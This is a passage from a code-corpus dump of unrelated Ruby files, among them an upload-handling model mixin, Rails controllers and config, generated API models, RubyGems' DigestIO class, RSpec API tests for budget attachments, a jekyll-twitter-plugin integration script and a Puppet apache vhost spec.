# this option to +:after_validation+ will prevent temp files being written during
# calls to +#save+ and similar methods.)
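#
# Example (an illustrative sketch rather than text from the gem's docs; the
# +Document+ model, +:manual+ attribute, and parameter names are assumptions):
#
#   class Document < ActiveRecord::Base
#     include EchoUploads::Model
#     echo_upload :manual, expires: 2.days
#   end
#
#   # Round-trip doc.echo_uploads_data in a hidden form field so a failed
#   # validation does not force the user to re-upload the file.
#   doc = Document.new(manual: params[:document][:manual])
#   doc.manual_original_filename if doc.has_manual?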
def echo_upload(attr, options = {})
options = {
expires: 1.day,
storage: Rails.configuration.echo_uploads.storage,
key: ::EchoUploads::File.default_key_proc,
write_tmp_file: :after_rollback
}.merge(options)
# Init the config object. We can't use [] syntax to set the hash key because
# class_attribute expects you to call the setter method every time the
# attribute value changes. (Merely calling [] would just mutate the referenced
# object, and wouldn't invoke the setter.)
self.echo_uploads_config ||= {}
self.echo_uploads_config = echo_uploads_config.merge attr => {}
# Define reader method for the file attribute.
if Rails::VERSION::MAJOR >= 5 and Rails::VERSION::MINOR >= 1
attribute attr
else
attr_reader attr
define_method("#{attr}=") do |file|
instance_variable_set "@#{attr}", file
if send(attr).present?
# Mark as dirty.
attribute_will_change! attr
end
end
end
# Define the accessor methods for the mapped version(s) of the file. Returns
# an array.
define_method("mapped_#{attr}") do
unless instance_variable_get("@mapped_#{attr}")
file = send attr
mapper = ::EchoUploads::Mapper.new file
if options[:map].is_a? Proc
options[:map].call file, mapper
else
send(options[:map], file, mapper)
end
# Write an array of ActionDispatch::Http::UploadedFile objects to the instance
# variable.
instance_variable_set("@mapped_#{attr}", mapper.outputs)
end
instance_variable_get("@mapped_#{attr}")
end
# Define the original filename method.
define_method("#{attr}_original_filename") do
echo_uploads_map_metadata(attr, options, &:original_filename)
end
# Define the path method. This method will raise if the given storage
# class doesn't support the #path method.
define_method("#{attr}_path") do
echo_uploads_map_metadata(attr, options) do |meta|
meta.path
end
end
# Define the MIME type method.
define_method("#{attr}_mime") do
echo_uploads_map_metadata(attr, options, &:mime_type)
end
alias_method "#{attr}_mime_type", "#{attr}_mime"
# Define the key method
define_method("#{attr}_key") do
echo_uploads_map_metadata(attr, options, &:key)
end
# Define the storage method.
define_method("#{attr}_storage") do
echo_uploads_map_metadata(attr, options, &:storage)
end
# Define the url method.
define_method("#{attr}_url") do |options = {}|
echo_uploads_map_metadata(attr, options) do |meta|
if meta.storage.respond_to?(:url)
meta.storage.url meta.key, options
else
raise(
NoMethodError,
"The Echo Uploads file store you've selected, " +
"#{meta.storage.class.to_s}, does not support the #url method."
)
end
end
end
# Define the has_x? method. Returns true if a permanent or temporary file has been
# persisted, or if a file (which may not be valid) has been uploaded this request
# cycle.
define_method("has_#{attr}?") do
# Does this record have a permanent file?
send("has_prm_#{attr}?") or
# Did the submitted form "remember" a previously saved metadata record?
send("has_tmp_#{attr}?") or
# Has a new file been uploaded in this request cycle?
send(attr).present?
end
# Define the has_prm_x? method. Returns true if the permanent metadata record
# exists and has its owner set to this object.
define_method("has_prm_#{attr}?") do
send("#{attr}_metadata").present? and send("#{attr}_metadata").persisted?
end
# Define the has_tmp_x? method. Returns true if the record "remembers"
# a temporary metadata record. (Typically because validation errors caused
# the form to be redisplayed.)
define_method("has_tmp_#{attr}?") do
send("#{attr}_tmp_metadata").present?
end
# Define the read_x method. Delegates to the #read method of the store (e.g.
# FilesystemStore).
define_method("read_#{attr}") do
echo_uploads_map_metadata(attr, options, &:read)
end
define_method("write_#{attr}") do |&block|
echo_uploads_write_prm_file(attr, options, &block)
end
define_method("#{attr}_size") do
echo_uploads_map_metadata(attr, options, &:size)
end
define_method("maybe_write_tmp_#{attr}") do
echo_uploads_maybe_write_tmp_file(attr, options)
end
define_method("destroy_#{attr}") do
echo_uploads_map_metadata(attr, options, &:destroy)
end
# Define the association with the metadata model.
if options[:multiple]
has_many("#{attr}_metadatas".to_sym,
->() { where(owner_attr: attr) },
as: :owner, dependent: :destroy, class_name: '::EchoUploads::File'
)
alias_method attr.to_s.pluralize, "#{attr}_metadatas"
define_method("#{attr}_metadata") do
send("#{attr}_metadatas").first
end
define_method("#{attr}_metadata=") do |val|
send("#{attr}_metadatas") << val
end
else
has_one("#{attr}_metadata".to_sym,
->() { where(owner_attr: attr) },
as: :owner, dependent: :destroy, class_name: '::EchoUploads::File'
)
end
# Define the temp attribute for the metadata model.
attr_accessor "#{attr}_tmp_metadata"
echo_uploads_configure_tmp_file_writing attr, options
echo_uploads_configure_prm_file_writing attr, options
end
end
end
end
| 40.491039 | 96 | 0.598477 |
e99a7f93a79fa8680c29d85044f11b911eb86abc
| 120 |
class WorkoutExerciseSerializer < ActiveModel::Serializer
attributes :sets, :reps, :exercise
has_one :exercise
end
| 20 | 57 | 0.791667 |
1118a17c8f017411f61df1f2116708e63ce4ff7a
| 746 |
class FriendBlocksController < ApplicationController
def create
friendship = current_user.friendships.where(friend_id: params[:id]).first
friendship.banned = true
friendship.save
flash[:success] = "#{friendship.friend.name} has been blocked!"
redirect_to friendships_path
end
def destroy
friendship = current_user.friendships.where(friend_id: params[:id]).first
friendship.banned = false
friendship.save
flash[:success] = "#{friendship.friend.name} has been unblocked!"
redirect_to friend_blocks_path
end
def index
banned_friends_id = current_user.friendships.where(banned: true).select(:friend_id)
@friends = current_user.friends.where("friend_id in (?)", banned_friends_id)
end
end
| 32.434783 | 87 | 0.743968 |
e86d185cd161e9a8f4898a44976f26afc8093e6a
| 91 |
# desc "Explaining what the task does"
# task :nested_models do
# # Task goes here
# end
| 18.2 | 38 | 0.692308 |
ffc37bed6bbfdcf60a8624837b47da9bc2aee0c1
| 457 |
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# Defines values for HubBgpConnectionStatus
#
module HubBgpConnectionStatus
Unknown = "Unknown"
Connecting = "Connecting"
Connected = "Connected"
NotConnected = "NotConnected"
end
end
end
| 24.052632 | 70 | 0.702407 |
e25d7fd18e1526918366d4eabd057159e5ce5fab
| 152 |
class AddNumReviewsToAssignments < ActiveRecord::Migration
def change
change_column :assignments, :num_reviews, :integer, :default => 3
end
end
| 25.333333 | 69 | 0.769737 |
4a482e7231524f9ffcebd0630bb705e805c6faf2
| 7,357 |
=begin
#Selling Partner API for A+ Content Management
#With the A+ Content API, you can build applications that help selling partners add rich marketing content to their Amazon product detail pages. A+ content helps selling partners share their brand and product story, which helps buyers make informed purchasing decisions. Selling partners assemble content by choosing from content modules and adding images and text.
OpenAPI spec version: 2020-11-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.26
=end
require 'date'
module AmzSpApi::AplusContentApiModel
# Plain positional text, used in collections of brief labels and descriptors.
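# Example (illustrative; the values are placeholders):
#   AmzSpApi::AplusContentApiModel::PlainTextItem.new(position: 1, value: 'Durable aluminium body')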
class PlainTextItem
# The rank or index of this text item within the collection. Different items cannot occupy the same position within a single collection.
attr_accessor :position
# The actual plain text.
attr_accessor :value
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'position' => :'position',
:'value' => :'value'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'position' => :'Object',
:'value' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::AplusContentApiModel::PlainTextItem` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::AplusContentApiModel::PlainTextItem`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'position')
self.position = attributes[:'position']
end
if attributes.key?(:'value')
self.value = attributes[:'value']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @position.nil?
invalid_properties.push('invalid value for "position", position cannot be nil.')
end
if @value.nil?
invalid_properties.push('invalid value for "value", value cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @position.nil?
return false if @value.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
position == o.position &&
value == o.value
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[position, value].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::AplusContentApiModel.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.126638 | 365 | 0.636673 |
f8bde0f557f439c5999e8a03ce9bf413363c200d
| 1,333 |
##
# IO wrapper that creates digests of contents written to the IO it wraps.
class Gem::Package::DigestIO
##
# Collected digests for wrapped writes.
#
# {
# 'SHA1' => #<OpenSSL::Digest: [...]>,
# 'SHA512' => #<OpenSSL::Digest: [...]>,
# }
attr_reader :digests
##
# Wraps +io+ and updates digest for each of the digest algorithms in
# the +digests+ Hash. Returns the digests hash. Example:
#
# io = StringIO.new
# digests = {
# 'SHA1' => OpenSSL::Digest.new('SHA1'),
# 'SHA512' => OpenSSL::Digest.new('SHA512'),
# }
#
# Gem::Package::DigestIO.wrap io, digests do |digest_io|
# digest_io.write "hello"
# end
#
# digests['SHA1'].hexdigest #=> "aaf4c61d[...]"
# digests['SHA512'].hexdigest #=> "9b71d224[...]"
def self.wrap io, digests
digest_io = new io, digests
yield digest_io
return digests
end
##
# Creates a new DigestIO instance. Using ::wrap is recommended, see the
# ::wrap documentation for documentation of +io+ and +digests+.
def initialize io, digests
@io = io
@digests = digests
end
##
# Writes +data+ to the underlying IO and updates the digests
def write data
result = @io.write data
@digests.each do |_, digest|
digest << data
end
result
end
end
| 20.507692 | 74 | 0.594899 |
1cdeaf3620b71a025a1d123a84b23a8828bbb4f8
| 3,637 |
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.phoenix_url = nil # Will default to current host:port
config.phoenix_path = '/proxy'
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable Rails's static asset server (Apache or nginx will already do this).
config.serve_static_assets = false
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Generate digests for assets URLs.
config.assets.digest = true
# `config.assets.precompile` has moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Set to :debug to see everything in the log.
config.log_level = :info
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# config.assets.precompile += %w( search.js )
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Disable automatic flushing of the log to improve performance.
# config.autoflush_log = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
config.action_mailer.asset_host = "http://104.131.33.74/"
config.action_mailer.default_url_options = { host: '104.131.33.74' }
config.action_mailer.default_options = {from: '[email protected]'}
end
| 40.411111 | 104 | 0.759417 |
62db8ae89627388c6b4238f6a76feb6e079072d8
| 5,051 |
require "tty-prompt"
require 'pry'
class PlayerHand
attr_accessor :cards, :deck, :round_won, :player
def initialize(deck, player)
@deck = deck
@cards = []
@player = player
10.times do
@cards.append(deck.remove_card)
end
# deck.players << self
@round_won = false
end
def make_move
puts "\nIt is #{@player.full_name}'s turn.\n\n".light_blue
card = deck.remove_card
while card do
spots = empty_spots
print_spots(spots)
card %= 13
if card == 0
if !(@player.is_cpu)
prompt = TTY::Prompt.new
location = prompt.select("You pulled a " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card! Choose an empty spot to fill with your " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card:", spots)
print "\n"
card = swap_cards(location)
if complete_hand?(@cards)
win
return true
end
else
i = spots.sample
card = @cards[i - 1]
@cards[i - 1] = nil
puts "#{@player.full_name} pulled a " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card! #{@player.full_name} fills a #{i} with their " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card.\n\n"
sleep(2.1)
if complete_hand?(@cards)
win
return true
end
end
elsif card == 11 || card == 12
garbage_card_prompt(card)
return true
else
replace_card_prompt(card)
temp = card
card = swap_cards(card)
if card == nil
already_played_prompt(temp)
end
if complete_hand?(@cards)
win
return true
end
end
end
end
private
  # Takes the card out of the given 1-based spot, marks the spot as played
  # (nil) and returns the card that was there, or nil if the spot had already
  # been played.
  def swap_cards(position)
    card = @cards[position - 1]
    @cards[position - 1] = nil
    card
  end
def replace_card_prompt(card)
if @player.is_cpu
puts "---> #{@player.full_name} pulled a " + "#{card}".light_red + "! #{@player.full_name} plays their " + "#{card}".light_red + ".\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("---> You pulled a " + "#{card}".light_red + "! Press enter to play your card.\n", keys: [:return])
end
end
def garbage_card_prompt(card)
if card == 11
card = "jack"
else
card = "queen"
end
if @player.is_cpu
puts "---> #{@player.full_name} pulled a " + "#{card}".light_red + ", which is a garbage card. Their turn ends.\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("---> You pulled a " + "#{card}".light_red + ", which is a garbage card. Press enter to end your turn.\n", keys: [:return])
end
end
def already_played_prompt(card)
if @player.is_cpu
puts "#{@player.full_name} has already played this " + "#{card}".light_red + ". Their turn ends.\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("You have already played a " + "#{card}".light_red + ". Press enter to end your turn.\n", keys: [:return])
end
end
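  # A spot counts as "empty" while its original face-down card is still in
  # place (non-nil); a nil entry marks a spot that has already been filled,
  # so complete_hand? succeeds once every entry has been replaced with nil.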
def empty_spots
i = 0
empty_spots = []
while i < 10 do
if @cards[i] != nil
empty_spots << i + 1
end
i += 1
end
empty_spots
end
def print_spots(empty)
if @player.is_cpu
print "#{@player.full_name} draws a card. Here are #{@player.full_name}'s empty spots: "
else
print "You draw a card. These are your empty spots: "
end
len = empty.length
if len > 2
i = 1
while i < len
print "#{empty[i - 1]}".green + ", "
i += 1
end
print "and " + "#{empty[len - 1]}\n\n".green
elsif len == 2
print "#{empty[0]} ".green + "and " + "#{empty[1]}\n\n".green
else
print "#{empty[0]}\n\n".green
end
end
def complete_hand?(array)
array.uniq.size <= 1
end
def win
@round_won = true
if @player.is_cpu
puts "#{@player.full_name} won the round!\n".light_blue
else
puts "You won the round!\n".light_blue
end
end
end
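# Usage sketch: PlayerHand only assumes a deck that responds to #remove_card
# and a player that responds to #full_name and #is_cpu, so a round can be
# driven roughly like the snippet below (Deck and Player are hypothetical
# names used only for illustration).
#
#   deck   = Deck.new                          # hypothetical deck object
#   player = Player.new("Ada", is_cpu: false)  # hypothetical player object
#   hand   = PlayerHand.new(deck, player)      # deals 10 cards from the deck
#   hand.make_move                             # loops until the turn ends
#   puts "Round over" if hand.round_won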
| 27.155914 | 270 | 0.463077 |
e8f53ad1d88508b3feff2867efa9cd077c39608f
| 42 |
module Slackbotsy
VERSION = "0.0.8"
end
| 10.5 | 19 | 0.690476 |
911c3958c98cf87598f4241f65ab85138bd1c089
| 4,785 |
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Attachments by budget resource', type: :request do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
include FileHelpers
let(:current_user) do
FactoryBot.create(:user,
member_in_project: project,
member_with_permissions: permissions)
end
let(:project) { FactoryBot.create(:project) }
let(:permissions) { [:view_budgets] }
let(:budget) { FactoryBot.create(:budget, project: project) }
subject(:response) { last_response }
before do
allow(User).to receive(:current).and_return current_user
end
describe '#get' do
let(:get_path) { api_v3_paths.attachments_by_budget budget.id }
before do
FactoryBot.create_list(:attachment, 2, container: budget)
get get_path
end
it 'should respond with 200' do
expect(subject.status).to eq(200)
end
it_behaves_like 'API V3 collection response', 2, 2, 'Attachment'
end
describe '#post' do
let(:permissions) { %i[view_budgets edit_budgets] }
let(:request_path) { api_v3_paths.attachments_by_budget budget.id }
let(:request_parts) { { metadata: metadata, file: file } }
let(:metadata) { { fileName: 'cat.png' }.to_json }
let(:file) { mock_uploaded_file(name: 'original-filename.txt') }
let(:max_file_size) { 1 } # given in kiB
before do
allow(Setting).to receive(:attachment_max_size).and_return max_file_size.to_s
post request_path, request_parts
end
it 'should respond with HTTP Created' do
expect(subject.status).to eq(201)
end
it 'should return the new attachment' do
expect(subject.body).to be_json_eql('Attachment'.to_json).at_path('_type')
end
it 'ignores the original file name' do
expect(subject.body).to be_json_eql('cat.png'.to_json).at_path('fileName')
end
context 'metadata section is missing' do
let(:request_parts) { { file: file } }
it_behaves_like 'invalid request body', I18n.t('api_v3.errors.multipart_body_error')
end
context 'file section is missing' do
# rack-test won't send a multipart request without a file being present
      # however, as long as we depend on correctly named sections, this test should do just fine
let(:request_parts) { { metadata: metadata, wrongFileSection: file } }
it_behaves_like 'invalid request body', I18n.t('api_v3.errors.multipart_body_error')
end
context 'metadata section is no valid JSON' do
let(:metadata) { '"fileName": "cat.png"' }
it_behaves_like 'parse error'
end
context 'metadata is missing the fileName' do
let(:metadata) { Hash.new.to_json }
it_behaves_like 'constraint violation' do
let(:message) { "fileName #{I18n.t('activerecord.errors.messages.blank')}" }
end
end
context 'file is too large' do
let(:file) { mock_uploaded_file(content: 'a' * 2.kilobytes) }
let(:expanded_localization) do
I18n.t('activerecord.errors.messages.file_too_large', count: max_file_size.kilobytes)
end
it_behaves_like 'constraint violation' do
let(:message) { "File #{expanded_localization}" }
end
end
context 'only allowed to add messages, but no edit permission' do
let(:permissions) { %i[view_messages add_messages] }
it_behaves_like 'unauthorized access'
end
context 'only allowed to view messages' do
let(:permissions) { [:view_messages] }
it_behaves_like 'unauthorized access'
end
end
end
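# Request sketch for the POST examples above: a multipart body with a JSON
# `metadata` part and a `file` part. The concrete path is whatever
# api_v3_paths.attachments_by_budget returns for the budget id; the shape
# below is an assumption, shown only for illustration.
#
#   POST /api/v3/budgets/:id/attachments
#   Content-Type: multipart/form-data
#     metadata: {"fileName":"cat.png"}
#     file: <uploaded binary>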
| 33 | 94 | 0.700313 |
389c9e27915ac866b1216d6b062172dbb24784e2
| 429 |
class ApplicationController < ActionController::Base
def hello
render html: "from local this time"
end
  def find_airport(code)
    @found = nil
    if !code.nil? && code.length == 3
      @found = Airport.find_by(iata: code)
    elsif !code.nil? && code.length == 4
      @found = Airport.find_by(icao: code)
    end
    @found
  end
end
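# Usage sketch: find_airport accepts either a 3-letter IATA code or a 4-letter
# ICAO code and returns the matching Airport record, or nil when the code is
# missing, malformed, or unknown. The sample codes below are illustrative.
#
#   find_airport("SFO")     # => Airport found by iata: "SFO" (or nil)
#   find_airport("KSFO")    # => Airport found by icao: "KSFO" (or nil)
#   find_airport(nil)       # => nil
#   find_airport("TOOLONG") # => nil (length is neither 3 nor 4)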
| 19.5 | 52 | 0.578089 |
265315a32c9916be31477846a952d58aaae4a7ae
| 2,307 |
# frozen_string_literal: true
# Basic integration example - run code to produce html output
#
# * Requires .env populated with valid Twitter API creds.
#
$LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require_relative "./support/jekyll_template"
require "jekyll-twitter-plugin"
require "erb"
require "byebug"
OUTPUT_FILENAME = "output_test.html"
OPTIONS = [
"https://twitter.com/jekyllrb maxwidth=500 limit=5",
"https://twitter.com/rubygems",
"https://twitter.com/i/moments/650667182356082688 maxwidth=500",
"https://twitter.com/TwitterDev/timelines/539487832448843776 limit=5 widget_type=grid maxwidth=500",
"https://twitter.com/rubygems/status/518821243320287232",
"https://twitter.com/rubygems/status/11",
"https://twitter.com/rubygems/status/518821243320287232 align=right width=350",
"https://twitter.com/Ace_Tate/status/225611299009216512",
"https://twitter.com/FeelsGood2BeMe/status/225456333032398848",
"oembed https://twitter.com/rubygems/status/518821243320287232",
].freeze
COLOUR_MAP = {
red: 31,
green: 32,
yellow: 33,
blue: 34
}.freeze
def say_with_colour(text, colour_name)
colour_code = COLOUR_MAP.fetch(colour_name)
puts "\e[#{colour_code}m#{text}\e[0m"
end
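# Example: with COLOUR_MAP above, say_with_colour("Done", :green) prints
# "\e[32mDone\e[0m", i.e. the text wrapped in the ANSI green escape sequence.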
class TwitterRenderer
Context = Struct.new(:registers)
Site = Struct.new(:config)
def initialize(options)
@options = options
@jekyll_context = Context.new(site: Site.new({}))
end
def render
ERB.new(template)
.result(binding)
end
private
attr_reader :options, :jekyll_context
def render_twitter_tag(params)
say_with_colour "Fetching with params: #{params}", :yellow
TwitterJekyll::TwitterTag.new(nil, params, nil).render(jekyll_context)
end
def template
<<~HTML
<html>
<body>
<h1>jekyll-twitter-plugin output tests</h1>
<% options.each do |option| %>
<h3><%= option %></h3>
<%= render_twitter_tag(option) %>
<hr>
<% end %>
</body>
</html>
HTML
end
end
def main
  renderer = TwitterRenderer.new(OPTIONS)
  File.open(OUTPUT_FILENAME, "w") do |f|
    f.write renderer.render
end
end
if __FILE__ == $PROGRAM_NAME
say_with_colour "Running integration tests...", :red
main
say_with_colour "Created file: #{OUTPUT_FILENAME}", :green
end
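# Usage sketch: run this file directly (e.g. `ruby integration.rb`, assuming
# that is the file name) with valid Twitter credentials in .env; it renders
# every entry in OPTIONS and writes the combined HTML to output_test.html.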
| 25.921348 | 102 | 0.698309 |
e82f9bdf160deacbe7f0384a6105c69692714c86
| 138 |
class AddUserIdToPet < ActiveRecord::Migration[6.0]
def change
add_reference :pets, :user, null: false, foreign_key: true
end
end
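# Sketch of the model side this reference supports (illustrative only; the
# actual model definitions are assumed to live elsewhere in the app):
#
#   class Pet < ApplicationRecord
#     belongs_to :user
#   end
#
#   class User < ApplicationRecord
#     has_many :pets
#   end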
| 23 | 62 | 0.73913 |
61a9869a582cb1a537941ba7614731a4432d0c47
| 100,486 |
require 'spec_helper'
describe 'apache::vhost', type: :define do
describe 'os-independent items' do
on_supported_os.each do |os, facts|
      # this setup uses fastcgi which isn't available on RHEL 7 / RHEL 8 / Ubuntu 18.04 / 20.04
next if facts[:os]['release']['major'] == '18.04' || facts[:os]['release']['major'] == '20.04'
      next if (facts[:os]['release']['major'] == '7' || facts[:os]['release']['major'] == '8') && facts[:os]['family'] == 'RedHat'
# next if facts[:os]['name'] == 'SLES'
apache_name = case facts[:os]['family']
when 'RedHat'
'httpd'
when 'Debian'
'apache2'
else
'apache2'
end
let :pre_condition do
"class {'apache': default_vhost => false, default_mods => false, vhost_enable_dir => '/etc/#{apache_name}/sites-enabled'}"
end
let :title do
'rspec.example.com'
end
let :default_params do
{
docroot: '/rspec/docroot',
port: '84',
}
end
context "on #{os} " do
let :facts do
facts
end
describe 'basic assumptions' do
let(:params) { default_params }
it { is_expected.to contain_class('apache') }
it { is_expected.to contain_class('apache::params') }
it { is_expected.to contain_apache__listen(params[:port]) }
          # name-based virtual hosts are only created on apache 2.2 and older
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i < 8) ||
(facts[:os]['name'] == 'Amazon') ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i < 12)
it { is_expected.to contain_apache__namevirtualhost("*:#{params[:port]}") }
end
end
context 'set everything!' do
let :params do
{
'docroot' => '/var/www/foo',
'manage_docroot' => false,
'virtual_docroot' => true,
'port' => '8080',
'ip' => '127.0.0.1',
'ip_based' => true,
'add_listen' => false,
'docroot_owner' => 'user',
'docroot_group' => 'wheel',
'docroot_mode' => '0664',
'serveradmin' => 'foo@localhost',
'ssl' => true,
'ssl_cert' => '/ssl/cert',
'ssl_key' => '/ssl/key',
'ssl_chain' => '/ssl/chain',
'ssl_crl_path' => '/ssl/crl',
'ssl_crl' => 'foo.crl',
'ssl_certs_dir' => '/ssl/certs',
'ssl_protocol' => 'SSLv2',
'ssl_cipher' => 'HIGH',
'ssl_honorcipherorder' => 'Off',
'ssl_verify_client' => 'optional',
'ssl_verify_depth' => '3',
'ssl_options' => '+ExportCertData',
'ssl_openssl_conf_cmd' => 'DHParameters "foo.pem"',
'ssl_proxy_verify' => 'require',
'ssl_proxy_check_peer_cn' => 'on',
'ssl_proxy_check_peer_name' => 'on',
'ssl_proxy_check_peer_expire' => 'on',
'ssl_proxyengine' => true,
'ssl_proxy_cipher_suite' => 'HIGH',
'ssl_proxy_protocol' => 'TLSv1.2',
'priority' => '30',
'default_vhost' => true,
'servername' => 'example.com',
'serveraliases' => ['test-example.com'],
'options' => ['MultiView'],
'override' => ['All'],
'directoryindex' => 'index.html',
'vhost_name' => 'test',
'logroot' => '/var/www/logs',
'logroot_ensure' => 'directory',
'logroot_mode' => '0600',
'logroot_owner' => 'root',
'logroot_group' => 'root',
